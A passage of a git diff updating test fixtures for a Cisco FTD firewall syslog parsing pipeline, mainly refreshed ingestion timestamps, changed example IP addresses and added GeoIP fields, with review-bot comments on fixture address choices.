@@ -251,7 +251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853598889Z", + "ingested": "2021-12-09T13:33:00.917275600Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, @@ -288,7 +288,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853600685Z", + "ingested": "2021-12-09T13:33:00.917280800Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -325,7 +325,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853602476Z", + "ingested": "2021-12-09T13:33:00.917286100Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, @@ -362,7 +362,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853604314Z", + "ingested": "2021-12-09T13:33:00.917291400Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, @@ -399,7 +399,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853606120Z", + "ingested": "2021-12-09T13:33:00.917296700Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, 
@@ -436,7 +436,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853608336Z", + "ingested": "2021-12-09T13:33:00.917302400Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -473,7 +473,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853610246Z", + "ingested": "2021-12-09T13:33:00.917307900Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, @@ -510,7 +510,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853612079Z", + "ingested": "2021-12-09T13:33:00.917313200Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -547,7 +547,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853613918Z", + "ingested": "2021-12-09T13:33:00.917318400Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -584,7 +584,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853615727Z", + "ingested": "2021-12-09T13:33:00.917323700Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, 
@@ -621,7 +621,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853617781Z", + "ingested": "2021-12-09T13:33:00.917329100Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -658,7 +658,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853619586Z", + "ingested": "2021-12-09T13:33:00.917334500Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -695,7 +695,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853621387Z", + "ingested": "2021-12-09T13:33:00.917339800Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -732,7 +732,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853623212Z", + "ingested": "2021-12-09T13:33:00.917345100Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -769,7 +769,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853625051Z", + "ingested": "2021-12-09T13:33:00.917350400Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, 
@@ -806,7 +806,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853626919Z", + "ingested": "2021-12-09T13:33:00.917355800Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -843,7 +843,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853628745Z", + "ingested": "2021-12-09T13:33:00.917361100Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, @@ -880,7 +880,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853630717Z", + "ingested": "2021-12-09T13:33:00.917366500Z", "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -917,7 +917,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853632547Z", + "ingested": "2021-12-09T13:33:00.917371800Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, @@ -954,7 +954,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853634351Z", + "ingested": "2021-12-09T13:33:00.917377200Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, 
@@ -991,7 +991,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853636151Z", + "ingested": "2021-12-09T13:33:00.917382500Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, @@ -1028,7 +1028,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853637993Z", + "ingested": "2021-12-09T13:33:00.917387700Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -1065,7 +1065,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853639810Z", + "ingested": "2021-12-09T13:33:00.917393Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1102,7 +1102,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853641619Z", + "ingested": "2021-12-09T13:33:00.917398300Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1139,7 +1139,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853643431Z", + "ingested": "2021-12-09T13:33:00.917403600Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, 
@@ -1176,7 +1176,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853645258Z", + "ingested": "2021-12-09T13:33:00.917408900Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1213,7 +1213,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853647100Z", + "ingested": "2021-12-09T13:33:00.917414200Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, @@ -1251,7 +1251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:46.853648929Z", + "ingested": "2021-12-09T13:33:00.917419500Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json index a2c9706b551..d6e82f0cd2f 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json 
@@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.155993511Z", + "ingested": "2021-12-09T13:33:02.768491200Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.155999980Z", + "ingested": "2021-12-09T13:33:02.768499400Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", 
@@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.156002100Z", + "ingested": "2021-12-09T13:33:02.768504900Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-07-19T09:06:48.156011291Z", + "ingested": "2021-12-09T13:33:02.768510300Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json index d146bcd972b..adc27b67bf5 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json 
@@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523888221Z", + "ingested": "2021-12-09T13:33:03.454300100Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523894630Z", + "ingested": "2021-12-09T13:33:03.454308200Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:48.523896846Z", + "ingested": "2021-12-09T13:33:03.454313700Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:48.523898756Z", + "ingested": "2021-12-09T13:33:03.454319Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log 
@@ -1,3 +1,3 @@
-<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
+<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]
 Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233
 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json
index 9df94700793..f31faf15512 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json
@@ -5,9 +5,27 @@
 "level": "notification"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
+ "location": {
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
 "port": 53,
- "address": "203.0.113.42",
- "ip": "203.0.113.42"
+ "ip": "81.2.69.144"
 },
 "syslog": {
 "facility": {
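Review bot: The new destination `81.2.69.144` is a real, routable address (the companion expected file attributes it to AS20712, Andrews & Arnold), replacing `203.0.113.42`, which sits in RFC 5737 TEST-NET-3 and was reserved for exactly this kind of fixture; presumably it was picked because it is one of the few addresses the GeoIP database used by the pipeline tests resolves, but nothing in the fixture records that, so the next "use documentation ranges" cleanup will revert it and silently break the geo assertions. A syslog fixture has no comment syntax, so put the constraint beside it, e.g. a line in the data stream's `_dev/test/pipeline` README: `81.2.69.144 is deliberately a live address covered by the test GeoIP database; keep it so the geo/ASN enrichment path is exercised`. The source-side change from `WHAT-IS-THIS-A-HOSTNAME-192.0.2.244` to `...-192.168.2.244` looks unnecessary: the expected output maps that token to `source.domain`, not an IP, so no lookup ever ran on it, and keeping the TEST-NET value would have preserved the check that a documentation-range string embedded in a hostname is not parsed as an address.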
@@ -16,8 +34,8 @@
 },
 "source": {
 "port": 27218,
- "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244",
- "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244"
+ "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244",
+ "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244"
 },
 "tags": [
 "preserve_original_event"
@@ -47,16 +65,16 @@
 },
 "related": {
 "hosts": [
- "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244"
+ "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244"
 ],
 "ip": [
- "203.0.113.42"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:06:48.766885781Z",
- "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]",
+ "ingested": "2021-12-09T13:33:03.880922800Z",
+ "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]",
 "code": "106100",
 "kind": "event",
 "action": "firewall-rule",
@@ -120,7 +138,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:48.766891794Z",
+ "ingested": "2021-12-09T13:33:03.880928800Z",
 "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233",
 "code": "302021",
 "kind": "event",
@@ -202,7 +220,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:48.766893926Z",
+ "ingested": "2021-12-09T13:33:03.880933800Z",
 "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware",
 "code": "338204",
 "kind": "event",
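Review bot: The added `destination.geo` / `destination.as` values (`GB-OXF`, `Abingdon`, AS `20712`) assert the contents of whichever GeoIP database the test harness bundles, not behaviour of the pipeline under review, so this expectation will fail the next time that database is refreshed even though nothing in the pipeline changed. Expected JSON cannot carry a comment, so that coupling should be recorded where the next person regenerating these files will see it, e.g. in the data stream's test README: `geo/as fields in *-expected.json are derived from the GeoIP test database shipped with the test runner; regenerate rather than hand-edit`. The `related` hunk is the useful assertion of this fixture — `related.ip` holds only `81.2.69.144` while the IP-looking hostname stays in `related.hosts` — and is worth naming in that same README as the property the file exists to protect.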
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log
index 09da866b488..663de2ad75a 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log
@@ -1,71 +1,71 @@ -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to 
inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP 
connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: 
%FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 